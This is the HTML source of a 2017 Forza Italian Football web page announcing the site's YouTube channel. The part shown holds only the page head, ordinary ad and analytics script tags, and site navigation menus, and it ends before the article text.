<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml" lang="en-GB">
<head>	<meta charset="UTF-8" />
<!-- Mobile Specific Metas--> <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
 <title>Introducing&#8230; Forza Italian Football TV |</title> 
<meta name="keywords" content="serie a news, italian football, italy, ac milan, inter, juventus, roma, lazio, fiorentina, serie a table, italian football podcast, azzurri"/>
	<meta property="og:title" content="Introducing&#8230; Forza Italian Football TV" />
	<meta property="og:description" content="" />
	<meta property="og:type" content="article" />
	<meta property="og:image" content="http://assets.forzaitalianfootball.com/wp-content/uploads/2017/01/FIFTV-4-150x150.png" />
         <link rel="stylesheet" href="http://forzaitalianfootball.com/wp-content/themes/newspapertimes-single-pro/handheld.css?v=3" type="text/css" />
            
           
        
	<link rel="stylesheet" href="http://forzaitalianfootball.com/wp-content/themes/newspapertimes-single-pro/style.css?v=3" type="text/css" media="screen"/>
    <link rel="shortcut icon" href="http://assets.forzaitalianfootball.com/wp-content/uploads/2016/08/New_FIF_Logo-Black-on-White-002.png"/>
    <link rel="shortcut icon" href="http://assets.forzaitalianfootball.com/wp-content/uploads/2016/08/New_FIF_Logo-Black-on-White-002.png" type="image/x-icon"/>
    <meta name="generator" content="Magazine3 Framework" />
	<!--[if IE]><script src="http://html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->
	<link rel="alternate" type="application/rss+xml" title=" RSS Feed" href="http://forzaitalianfootball.com/feed/" />
	<link rel="pingback" href="http://forzaitalianfootball.com/xmlrpc.php" />
 
    <meta name="google-site-verification" content="ipzRTFs7BK-TJX5CnTeSdpZJ9CGtiSY1993R6DOTHmw" />
<!-- Begin comScore Tag -->
<script>
  var _comscore = _comscore || [];
  _comscore.push({ c1: "2", c2: "12294186" });
  (function() {
    var s = document.createElement("script"), el = document.getElementsByTagName("script")[0]; s.async = true;
    s.src = (document.location.protocol == "https:" ? "https://sb" : "http://b") + ".scorecardresearch.com/beacon.js";
    el.parentNode.insertBefore(s, el);
  })();
</script>
<noscript>
  <img src="http://b.scorecardresearch.com/p?c1=2&c2=12294186&cv=2.0&cj=1" />
</noscript>
<!-- End comScore Tag -->
 

     <style>#content .post {  border: none !important;} </style>  <style media="screen" type="text/css"> .custom1{border-top:3px solid #000000 !important;} .custom1 a{color:#000000 !important;} .custom2{border-top:3px solid #000000 !important;}  .custom2 a{color:#000000 !important}  .custom3{border-top:3px solid #000 !important;}  .custom3 a{color:#000 !important} .custom4{border-top:3px solid #000 !important;} .custom4 a{color:#000 !important} .custom5{border-top:3px solid #000 !important;} .custom5 a{color:#000 !important} .custom6{border-top:3px solid #000 !important;} .custom6 a{color:#000 !important} .custom7{border-top:3px solid #000 !important;} .custom7 a{color:#000 !important}    
.custom8{border-top:3px solid #000 !important;} .custom8 a{color:#000 !important} .custom9{border-top:3px solid #000 !important;} .custom9 a{color:#000 !important} .custom10{border-top:3px solid #000 !important;} .custom10 a{color:#000 !important} .custom11{border-top:3px solid #000 !important;} .custom11 a{color:#000 !important} .custom12{border-top:3px solid #000 !important;} .custom12 a{color:#000 !important}     </style>
 <meta name="google-site-verification" content="US9I8a_JYS5YHv_dTmo0pgYYcGDdTaQNSgH_bI0OBpw" />

<meta name="google-site-verification" content="d_t5HP47q0M3y31NvumMR9jMwFEYGT-HAQNdBPLeGK8" /> 
<meta name="p:domain_verify" content="56ccc2a3cfd162b678b9f718105f0678"/> 

<meta property="fb:pages" content="157605524250079" />

<script src="http://tags.crwdcntrl.net/c/7683/cc_af.js"></script>
<script type="text/javascript" src="http://ad.crwdcntrl.net/5/c=7666/pe=y/to=y/var=adtechccauds"></script>
<script type="text/javascript">
var adtechCCfullstring = "";
if (typeof(adtechccauds) != 'undefined'){
for (var cci = 0; cci < adtechccauds.Profile.Audiences.Audience.length; cci++){
if (cci > 0) adtechCCfullstring += ":";
adtechCCfullstring +=adtechccauds.Profile.Audiences.Audience[cci].abbr;
}
}
</script><link rel="canonical" href="http://forzaitalianfootball.com/2017/01/introducing-forza-italian-football-tv/" /> 


           
        
     <script type="text/javascript">
   window._taboola = window._taboola || [];
   _taboola.push({article:'auto'});
   !function (e, f, u) {
       e.async = 1;
       e.src = u;
       f.parentNode.insertBefore(e, f);
   }(document.createElement('script'), document.getElementsByTagName('script')[0], 'http://cdn.taboola.com/libtrc/snackmedia-network/loader.js');
</script>

 
<!-- This site is optimized with the Yoast WordPress SEO plugin v1.1.5 - http://yoast.com/wordpress/seo/ -->
<meta name="description" content="Here at FIF are always trying to bring your daily fix of calcioand To help do that, we have started Forza Italian Football TV on YouTube."/>
<meta name="keywords" content="italian football tv, serie a tv, forza italian football"/>
<meta name="robots" content="noodp,noydir"/>
<!-- / Yoast WordPress SEO plugin. -->


<!-- All in One SEO Pack 2.3.11.1 by Michael Torbert of Semper Fi Web Design[221,277] -->
<meta name="keywords"  content="forza italian football,italian football tv,serie a tv" />

<!-- /all in one seo pack -->
<link rel='dns-prefetch' href='//ajax.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title=" &raquo; Introducing&#8230; Forza Italian Football TV Comments Feed" href="http://forzaitalianfootball.com/2017/01/introducing-forza-italian-football-tv/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/2.2.1\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/forzaitalianfootball.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.7"}};
			!function(a,b,c){function d(a){var b,c,d,e,f=String.fromCharCode;if(!k||!k.fillText)return!1;switch(k.clearRect(0,0,j.width,j.height),k.textBaseline="top",k.font="600 32px Arial",a){case"flag":return k.fillText(f(55356,56826,55356,56819),0,0),!(j.toDataURL().length<3e3)&&(k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,65039,8205,55356,57096),0,0),b=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55356,57331,55356,57096),0,0),c=j.toDataURL(),b!==c);case"emoji4":return k.fillText(f(55357,56425,55356,57341,8205,55357,56507),0,0),d=j.toDataURL(),k.clearRect(0,0,j.width,j.height),k.fillText(f(55357,56425,55356,57341,55357,56507),0,0),e=j.toDataURL(),d!==e}return!1}function e(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g,h,i,j=b.createElement("canvas"),k=j.getContext&&j.getContext("2d");for(i=Array("flag","emoji4"),c.supports={everything:!0,everythingExceptFlag:!0},h=0;h<i.length;h++)c.supports[i[h]]=d(i[h]),c.supports.everything=c.supports.everything&&c.supports[i[h]],"flag"!==i[h]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[i[h]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='style.css-css'  href='http://forzaitalianfootball.com/wp-content/plugins/google-language-translator/css/style.css?ver=4.7' type='text/css' media='all' />
<link rel='stylesheet' id='snack_cookie_css-css'  href='http://forzaitalianfootball.com/wp-content/plugins/snack-cookie-consent/css/dark-top.css?ver=4.7' type='text/css' media='all' />
<link rel='stylesheet' id='theiaPostSlider-css'  href='http://forzaitalianfootball.com/wp-content/plugins/theia-post-slider/css/font-theme.css?ver=1.9.0' type='text/css' media='all' />
<link rel='stylesheet' id='theiaPostSlider-font-css'  href='http://forzaitalianfootball.com/wp-content/plugins/theia-post-slider/fonts/style.css?ver=1.9.0' type='text/css' media='all' />
<link rel='stylesheet' id='wp-polls-css'  href='http://forzaitalianfootball.com/wp-content/plugins/wp-polls/polls-css.css?ver=2.73.2' type='text/css' media='all' />
<style id='wp-polls-inline-css' type='text/css'>
.wp-polls .pollbar {
	margin: 1px;
	font-size: 6px;
	line-height: 8px;
	height: 8px;
	background-image: url('http://forzaitalianfootball.com/wp-content/plugins/wp-polls/images/default/pollbg.gif');
	border: 1px solid #c8c8c8;
}

</style>
<link rel='stylesheet' id='wp-pagenavi-css'  href='http://forzaitalianfootball.com/wp-content/plugins/wp-pagenavi/pagenavi-css.css?ver=2.70' type='text/css' media='all' />
<link rel='stylesheet' id='wpgallery-css'  href='http://forzaitalianfootball.com/wp-content/plugins/wordpress-gallery-plugin/css/wp_gallery.css?ver=4.7' type='text/css' media='all' />
<link rel='stylesheet' id='nivoslider-css'  href='http://forzaitalianfootball.com/wp-content/plugins/wordpress-gallery-plugin/css/nivo-slider.css?ver=4.7' type='text/css' media='all' />
<link rel='stylesheet' id='colorbox-css'  href='http://forzaitalianfootball.com/wp-content/plugins/wordpress-gallery-plugin/lightbox/colorbox/colorbox.css?ver=4.7' type='text/css' media='all' />
<script type='text/javascript' src='http://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js?ver=4.7'></script>
<script type='text/javascript' src='http://forzaitalianfootball.com/wp-content/plugins/google-language-translator/js/flags.js?ver=4.7'></script>
<script type='text/javascript' src='http://forzaitalianfootball.com/wp-content/plugins/snack-cookie-consent/js/cookie.consent.latesttwo.min.js?ver=4.7'></script>
<script type='text/javascript' src='http://forzaitalianfootball.com/wp-content/plugins/theia-post-slider/js/balupton-history.js/jquery.history.js?ver=1.7.1'></script>
<script type='text/javascript' src='http://forzaitalianfootball.com/wp-content/plugins/theia-post-slider/js/async.min.js?ver=14.09.2014'></script>
<script type='text/javascript' src='http://forzaitalianfootball.com/wp-content/plugins/theia-post-slider/js/tps.js?ver=1.9.0'></script>
<script type='text/javascript' src='http://forzaitalianfootball.com/wp-content/plugins/theia-post-slider/js/tps-transition-slide.js?ver=1.9.0'></script>
<script type='text/javascript' src='http://forzaitalianfootball.com/wp-content/plugins/wordpress-gallery-plugin/js/jquery.nivo.slider.pack.js?ver=4.7'></script>
<script type='text/javascript' src='http://forzaitalianfootball.com/wp-content/plugins/wordpress-gallery-plugin/lightbox/colorbox/jquery.colorbox-min.js?ver=4.7'></script>
<script type='text/javascript' src='http://forzaitalianfootball.com/wp-content/themes/newspapertimes-single-pro/js/slides.min.jquery.js'></script>
<script type='text/javascript' src='http://forzaitalianfootball.com/wp-content/themes/newspapertimes-single-pro/js/ticker.js'></script>
<script type='text/javascript' src='http://forzaitalianfootball.com/wp-content/themes/newspapertimes-single-pro/js/tabticker.js'></script>
<link rel='https://api.w.org/' href='http://forzaitalianfootball.com/wp-json/' />
<meta name="generator" content="WordPress 4.7" />
<link rel="alternate" type="application/json+oembed" href="http://forzaitalianfootball.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fforzaitalianfootball.com%2F2017%2F01%2Fintroducing-forza-italian-football-tv%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://forzaitalianfootball.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fforzaitalianfootball.com%2F2017%2F01%2Fintroducing-forza-italian-football-tv%2F&#038;format=xml" />
<style type="text/css">p.hello { font-size:12px; color:darkgray; }#google_language_translator, #flags { text-align:left; }#google_language_translator { clear:both; }#flags { width:165px; }#flags a { display:inline-block; margin-right:2px; }.goog-tooltip {display: none !important;}.goog-tooltip:hover {display: none !important;}.goog-text-highlight {background-color: transparent !important; border: none !important; box-shadow: none !important;}#google_language_translator { width:auto !important; }#google_language_translator { display:none; }#google_language_translator {color: transparent;}body { top:0px !important; }</style><script type="text/javascript"><!--
function powerpress_pinw(pinw_url){window.open(pinw_url, 'PowerPressPlayer','toolbar=0,status=0,resizable=1,width=460,height=320');	return false;}
//-->
</script>
<!-- Begin Cookie Consent plugin by Silktide - http://silktide.com/cookieconsent -->
<script type="text/javascript">
    window.cookieconsent_options = {"message":"We use cookies to give you the best experience on our website.","dismiss":"Got it!","learnMore":"More info","link":"/privacy-policy","theme":"/wp-content/plugins/snack-cookie-consent/css/dark-top.css"};
</script>		<style>
			.theiaPostSlider_nav.fontTheme ._title,
			.theiaPostSlider_nav.fontTheme ._text {
				line-height: 50px;
			}

			.theiaPostSlider_nav.fontTheme ._button {
				color: #0053e2;
			}

			.theiaPostSlider_nav.fontTheme ._button ._2 span {
				font-size: 50px;
				line-height: 50px;
			}

			.theiaPostSlider_nav.fontTheme ._button:hover,
			.theiaPostSlider_nav.fontTheme ._button:focus {
				color: #2b79ff;
			}

			.theiaPostSlider_nav.fontTheme ._disabled {
				color: #707070 !important;
			}
		</style>
	

<!-- Facebook Like Thumbnail (v0.4) -->
<meta property="og:image" content="http://assets.forzaitalianfootball.com/wp-content/uploads/2017/01/FIFTV-4.png" />
<!-- using featured thumbnail -->
<!-- Facebook Like Thumbnail (By Ashfame - https://github.com/ashfame/facebook-like-thumbnail) -->

<!-- Vipers Video Quicktags v6.6.0 | http://www.viper007bond.com/wordpress-plugins/vipers-video-quicktags/ -->
<style type="text/css">
.vvqbox { display: block; max-width: 100%; visibility: visible !important; margin: 10px auto; } .vvqbox img { max-width: 100%; height: 100%; } .vvqbox object { max-width: 100%; } 
</style>
<script type="text/javascript">
// <![CDATA[
	var vvqflashvars = {};
	var vvqparams = { wmode: "opaque", allowfullscreen: "true", allowscriptaccess: "always" };
	var vvqattributes = {};
	var vvqexpressinstall = "http://forzaitalianfootball.com/wp-content/plugins/vipers-video-quicktags/resources/expressinstall.swf";
// ]]>
</script>

  <script type="text/javascript" src="http://ad.crwdcntrl.net/5/c=7666/pe=y/to=y/var=adtechccauds"></script>
  <script type="text/javascript">
    var adtechCCfullstring = "";
    if (typeof(adtechccauds) != 'undefined') {
      for (var cci = 0; cci < adtechccauds.Profile.Audiences.Audience.length; cci++){
        if (cci > 0) adtechCCfullstring += ":";
        adtechCCfullstring +=adtechccauds.Profile.Audiences.Audience[cci].abbr;
      }
    }    
  </script>           
</head> <body class="post-template-default single single-post postid-158011 single-format-standard">

<div class="top1"><a name="top"></a></div> 
   
     <div class="ad9"></div> 
<div id="wrapper"> 
    <div id="header">
    <div id="topheaderbar">
        <div id="topheaderbar-l">
        <div id="topnavigation">
          <div id="edition">Edition: International | </div>        <div id="nav"><div id="menu"><ul><div class="menu-header"><ul id="menu-contact" class="menu"><li id="menu-item-20931" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-20931"><a href="http://forzaitalianfootball.com/contact-us/">Contact Us</a></li>
<li id="menu-item-22942" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-22942"><a href="http://forzaitalianfootball.com/advertise/">Advertise</a></li>
<li id="menu-item-20932" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-20932"><a href="http://forzaitalianfootball.com/privacy-policy/">Privacy Policy</a></li>
<li id="menu-item-20933" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-20933"><a href="http://forzaitalianfootball.com/terms-and-conditions/">Terms and Conditions</a></li>
</ul></div></ul></div></div>
          </div>
          <style>
            #topheaderbar-l { width: 830px; }
            #flags { float: left; width: 260px; margin-left: 15px; display: inline-block;}
            .clearfix {clear: both;}
          </style>
          <div id="flags" class="size16"><ul id="sortable" class="ui-sortable" style="float:left"><li id='English'><a title='English' class='notranslate flag en'></a></li><li id='Arabic'><a title='Arabic' class='notranslate flag ar'></a></li><li id='Chinese(Simplified)'><a title='Chinese(Simplified)' class='notranslate flag zh-CN'></a></li><li id='French'><a title='French' class='notranslate flag fr'></a></li><li id='German'><a title='German' class='notranslate flag de'></a></li><li id='Hindi'><a title='Hindi' class='notranslate flag hi'></a></li><li id='Indonesian'><a title='Indonesian' class='notranslate flag id'></a></li><li id='Italian'><a title='Italian' class='notranslate flag it'></a></li><li id='Japanese'><a title='Japanese' class='notranslate flag ja'></a></li><li id='Portuguese'><a title='Portuguese' class='notranslate flag pt'></a></li><li id='Russian'><a title='Russian' class='notranslate flag ru'></a></li><li id='Spanish'><a title='Spanish' class='notranslate flag es'></a></li><li id='Swedish'><a title='Swedish' class='notranslate flag sv'></a></li></ul></div><div id="google_language_translator"></div>        </div>
        <div class="clearfix"></div>
        <div style='max-width:970px; min-width:728px; max-height:250px; min-height:90px; text-align:center;'>
<!--JavaScript Tag with group ID // Tag for network 1639: Snack Media  // Website: ForzaItalianFootball.com // Page: ROS // Placement: ForzaItalianFootball Billboard (5597758) // created at: Jan 8, 2016 12:04:41 PM 2 -->

      <script language="javascript">
      <!--
        if (window.adgroupid == undefined) {
          window.adgroupid = Math.round(Math.random() * 1000);
        }
        document.write('<scr'+'ipt language="javascript1.1" src="http://adserver.adtech.de/addyn/3.0/1639/5597758/0/2466/ADTECH;loc=100;target=_blank;kvpageID=158011;kvcats=97:2153;kvext_inv_code=105;KVabbr='+ adtechCCfullstring +';grp='+window.adgroupid+';misc='+new Date().getTime()+'"></scri'+'pt>');
      //-->
      </script>
      <noscript>
        <a href="http://adserver.adtech.de/adlink/3.0/1639/5597758/0/2466/ADTECH;loc=300;kvpageID=158011;kvcats=97:2153;kvext_inv_code=105;KVabbr='+ adtechCCfullstring +'" target="_blank">
          <img src="http://adserver.adtech.de/adserv/3.0/1639/5597758/0/2466/ADTECH;loc=300;kvpageID=158011;kvcats=97:2153;kvext_inv_code=105;KVabbr='+ adtechCCfullstring +'" border="0" width="970" height="250">
        </a>
      </noscript>
    <!-- End of JavaScript Tag -->
</div> 
		        <div id="topheaderbar-r">Sunday 08 January, 2017</div>
        <div class="cb"></div>
    </div>	    
    <div id="header2">
    <div id="logoleft"><a href="http://forzaitalianfootball.com"><img src="http://assets.forzaitalianfootball.com/wp-content/uploads/2016/08/FIF_banner_new.png" class="scale-with-grid" alt="" /></a></div>

	
   
        <div id="logoright">
    <div id="logoright-left">
    <div id="logoright-left-cat">
    <div id="logoright-left-cat-wrapper">
    <div id="logoright-left-cat-wrapper-title">Features:</div>    
      
   
    <div id="logoright-left-cat-wrapper-left"> 
    
                    
                
                          <a href="http://forzaitalianfootball.com/2017/01/transfer-market-round-up-7th-january-2017/"><img width="55" height="45" src="http://assets.forzaitalianfootball.com/wp-content/uploads/2014/01/Calciomercato-55x45.jpg" class="attachment-singlegalthumb size-singlegalthumb wp-post-image" alt="" srcset="http://assets.forzaitalianfootball.com/wp-content/uploads/2014/01/Calciomercato-55x45.jpg 55w, http://assets.forzaitalianfootball.com/wp-content/uploads/2014/01/Calciomercato-173x137.jpg 173w, http://assets.forzaitalianfootball.com/wp-content/uploads/2014/01/Calciomercato-150x125.jpg 150w" sizes="(max-width: 55px) 100vw, 55px" /></a>
              
            
           
            

             

    </div>
    <div id="logoright-left-cat-wrapper-right"><div id="logoright-left-cat-wrapper-right-cattitle"><a href="http://forzaitalianfootball.com/serie-a-clubs/ac-milan/" rel="category tag">AC Milan</a>, <a href="http://forzaitalianfootball.com/opinion/" rel="category tag">Features</a>, <a href="http://forzaitalianfootball.com/serie-a-clubs/fiorentina/" rel="category tag">Fiorentina</a>, <a href="http://forzaitalianfootball.com/serie-a-clubs/genoa/" rel="category tag">Genoa</a>, <a href="http://forzaitalianfootball.com/serie-a-clubs/inter/" rel="category tag">Inter</a>, <a href="http://forzaitalianfootball.com/serie-a-clubs/juventus/" rel="category tag">Juventus</a>, <a href="http://forzaitalianfootball.com/serie-a-clubs/lazio/" rel="category tag">Lazio</a>, <a href="http://forzaitalianfootball.com/serie-a-clubs/napoli/" rel="category tag">Napoli</a>, <a href="http://forzaitalianfootball.com/news/" rel="category tag">News</a>, <a href="http://forzaitalianfootball.com/serie-a-clubs/as-roma/" rel="category tag">Roma</a></div><h2><a href="http://forzaitalianfootball.com/2017/01/transfer-market-round-up-7th-january-2017/" title="Transfer Market Round-up: 7th January 2017">Transfer Market Round-up: 7th January 2017...</a></h2></div>
      
    <div class="cb"></div>
    </div>
    </div>
    </div>
    <div id="logoright-right">
    <div id="logoright-right-search"><form method="get" id="footersearch1" action="http://forzaitalianfootball.com/">
<input type="text" name="s" value=" Search News - Type Keyword & Hit Enter" onblur="if(this.value=='') this.value=' Search News - Type Keyword & Hit Enter';" onfocus="if(this.value==' Search News - Type Keyword & Hit Enter') this.value='';" id="s2" />
			<input type="submit" value=" " id="searchsubmit" />
		   </form></div>
    <div id="logoright-right-trending"><ul>
    <li><b>Trending Topics:</b></li>
     
         


     
         


     
         


     
         


     
         


     
         


     
         


     
         


     
         
        </ul></div>
    </div>
    <div class="cb"></div>
    </div>
     
          
    
    
    <div class="cb"></div>
    </div> 
   

    <div id="header3">
    <div id="header3-1">
    <div id="header3-1-left">
    <div id="header3-1-left-tickerimg"><img src="http://forzaitalianfootball.com/wp-content/themes/newspapertimes-single-pro/images/headlines.png" alt="Headlines" /></div>
    <div id="header3-1-left-ticker">
	 	<ul id="once">
   <li><a href="http://forzaitalianfootball.com/2017/01/transfer-market-round-up-7th-january-2017/" rel="bookmark" title="Permanent Link: Transfer Market Round-up: 7th January 2017">Transfer Market Round-up: 7th January 2017</a></li>    <li><a href="http://forzaitalianfootball.com/2017/01/introducing-forza-italian-football-tv/" rel="bookmark" title="Permanent Link: Introducing... Forza Italian Football TV">Introducing... Forza Italian Football TV</a></li>    <li><a href="http://forzaitalianfootball.com/2017/01/serie-a-2016-17-five-things-to-look-out-for-in-round-19/" rel="bookmark" title="Permanent Link: Serie A 2016-17: Five Things To Look Out For In Round 19">Serie A 2016-17: Five Things To Look Out For In Round 19</a></li>    <li><a href="http://forzaitalianfootball.com/2017/01/which-youngsters-could-join-locatelli-in-the-ac-milan-first-team/" rel="bookmark" title="Permanent Link: Which youngsters could join Locatelli in the AC Milan first team?">Which youngsters could join Locatelli in the AC Milan first team?</a></li>    <li><a href="http://forzaitalianfootball.com/2017/01/youth-and-competitiveness-make-serie-b-intriguing/" rel="bookmark" title="Permanent Link: Youth and competitiveness make Serie B intriguing">Youth and competitiveness make Serie B intriguing</a></li> 	</ul>
		</div>
    <div class="cb"></div>
    </div>
    <div id="header3-1-right">
    <ul>
<li style="margin-left: 2px;"><a href="http://feeds.feedburner.com/ForzaItalianFootball" target="_blank"><img src="http://forzaitalianfootball.com/wp-content/themes/newspapertimes-single-pro/images/rss.png" /></a></li> 
<li style="margin-left: 8px;"><a href="contact-us/" target="_blank"><img src="http://forzaitalianfootball.com/wp-content/themes/newspapertimes-single-pro/images/email.png" /></a></li> 
   
  <li><a href="http://facebook.com/forzaitalianfootball" target="_blank"><img src="http://forzaitalianfootball.com/wp-content/themes/newspapertimes-single-pro/images/facebook.png" /></a> </li>      <li><a href="http://instagram.com/forzaitalianfootball" target="_blank"><img src="http://forzaitalianfootball.com/wp-content/themes/newspapertimes-single-pro/images/instagram.png" /></a> </li>    <li><a href="http://www.linkedin.com/groups/Forza-Italian-Football-4671707" target="_blank"><img src="http://forzaitalianfootball.com/wp-content/themes/newspapertimes-single-pro/images/linkedin.png" /></a> </li>  <li><a href="http://pinterest.com" target="_blank"><img src="http://forzaitalianfootball.com/wp-content/themes/newspapertimes-single-pro/images/pinterest.png" /></a> </li>    <li><a href="http://www.youtube.com/user/ForzaItalianFootball" target="_blank"><img src="http://forzaitalianfootball.com/wp-content/themes/newspapertimes-single-pro/images/youtube.png" /></a> </li>  <li><a href="http://twitter.com/serieaffc" target="_blank"><img src="http://forzaitalianfootball.com/wp-content/themes/newspapertimes-single-pro/images/twitter.png" /></a> </li>                    </ul> 
    </div>
    <div class="cb"></div>
    </div>
    
    <div id="header3-2">
     
    <div id="menu2"><ul><div class="menu-header"><ul id="menu-club-focus" class="menu"><li id="menu-item-37476" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-37476"><a href="http://forzaitalianfootball.com/news/">News</a></li>
<li id="menu-item-21659" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children arrow menu-item-21659"><a href="http://forzaitalianfootball.com/serie-a/">Serie A</a>
<ul class="sub-menu">
	<li id="menu-item-21511" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-21511"><a href="http://forzaitalianfootball.com/2012/08/serie-a-standings/">Table</a></li>
	<li id="menu-item-21512" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-21512"><a href="http://forzaitalianfootball.com/2012/07/serie-a-2012-2013-full-fixture-list/">Results &#038; Fixtures</a></li>
	<li id="menu-item-39396" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-39396"><a href="http://forzaitalianfootball.com/match-analysis/match-preview/">Match Previews</a></li>
	<li id="menu-item-21513" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-21513"><a href="http://forzaitalianfootball.com/match-analysis/match-report/">Match Reports</a></li>
	<li id="menu-item-89572" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-89572"><a href="http://forzaitalianfootball.com/match-analysis/player-ratings/">Player Ratings</a></li>
	<li id="menu-item-21514" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21514"><a href="http://forzaitalianfootball.com/clubs/">Club-By-Club News</a></li>
</ul>
</li>
<li id="menu-item-21660" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children arrow menu-item-21660"><a href="http://forzaitalianfootball.com/serie-b/">Serie B</a>
<ul class="sub-menu">
	<li id="menu-item-21519" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-21519"><a href="http://forzaitalianfootball.com/2012/08/serie-b-standings/">Table</a></li>
	<li id="menu-item-21520" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-21520"><a href="http://forzaitalianfootball.com/2012/08/serie-b-2012-2013-full-fixture-list/">Results &#038; Fixtures</a></li>
</ul>
</li>
<li id="menu-item-55173" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children arrow menu-item-55173"><a href="http://forzaitalianfootball.com/champions-league-home/">Champions League</a>
<ul class="sub-menu">
	<li id="menu-item-55175" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-55175"><a href="http://forzaitalianfootball.com/champions-league-standings/">Tables</a></li>
	<li id="menu-item-55176" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-55176"><a href="http://forzaitalianfootball.com/champions-league-results-and-fixtures/">Results &#038; Fixtures</a></li>
	<li id="menu-item-55177" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-55177"><a href="http://forzaitalianfootball.com/champions-league/champions-league-match-reports/">Match Reports</a></li>
	<li id="menu-item-89569" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-89569"><a href="http://forzaitalianfootball.com/champions-league/champions-league-player-ratings/">Player Ratings</a></li>
	<li id="menu-item-55178" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-55178"><a href="http://forzaitalianfootball.com/champions-league/champions-league-news/">News</a></li>
</ul>
</li>
<li id="menu-item-55181" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children arrow menu-item-55181"><a href="http://forzaitalianfootball.com/europa-league-home/">Europa League</a>
<ul class="sub-menu">
	<li id="menu-item-55186" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-55186"><a href="http://forzaitalianfootball.com/europa-league-standings/">Tables</a></li>
	<li id="menu-item-55185" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-55185"><a href="http://forzaitalianfootball.com/europa-league-results-and-fixtures/">Results &#038; Fixtures</a></li>
	<li id="menu-item-55187" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-55187"><a href="http://forzaitalianfootball.com/europa-league/europa-league-match-reports/">Match Reports</a></li>
	<li id="menu-item-89570" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-89570"><a href="http://forzaitalianfootball.com/europa-league/europa-league-player-ratings/">Player Ratings</a></li>
	<li id="menu-item-55188" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-55188"><a href="http://forzaitalianfootball.com/europa-league/europa-league-news/">News</a></li>
</ul>
</li>
<li id="menu-item-21670" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children arrow menu-item-21670"><a href="http://forzaitalianfootball.com/coppa-italia-tim-cup/">Coppa Italia</a>
<ul class="sub-menu">
	<li id="menu-item-21668" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21668"><a href="http://forzaitalianfootball.com/coppa-italia-fixtures-and-results/">Fixtures &#038; Results</a></li>
	<li id="menu-item-21672" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-21672"><a href="http://forzaitalianfootball.com/coppa-italia-match-reports/">Match Reports</a></li>
	<li id="menu-item-21673" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-21673"><a href="http://forzaitalianfootball.com/coppa-italia-news/">Coppa Italia News</a></li>
</ul>
</li>
<li id="menu-item-35042" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-35042"><a href="http://forzaitalianfootball.com/match-highlights/">Highlights</a></li>
<li id="menu-item-20919" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-has-children arrow menu-item-20919"><a href="http://forzaitalianfootball.com/azzurri/">Azzurri</a>
<ul class="sub-menu">
	<li id="menu-item-43823" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-43823"><a href="http://forzaitalianfootball.com/azzurri/">News</a></li>
